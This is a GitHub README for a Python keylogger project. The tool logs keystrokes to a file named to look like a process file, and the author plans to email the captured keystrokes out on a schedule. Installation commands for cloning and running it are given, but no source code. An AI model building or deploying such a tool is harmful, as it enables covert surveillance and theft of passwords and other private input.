Skip to content

Latest commit

 

History

History
11 lines (11 loc) · 407 Bytes

README.md

File metadata and controls

11 lines (11 loc) · 407 Bytes

keyLogger Project in Python

A simple python keylogger that logs key stroke and save it to a file called processmanger.txt working on the project to see that it can send key strokes to a specified email address at a given time.

INSTALLATION

git clone https://github.com/cyberxploithausa/Key_Logger.git
cd Key_Logger
pip install -r requirements.txt
chmod +x keylogger.py
python3 keylogger.py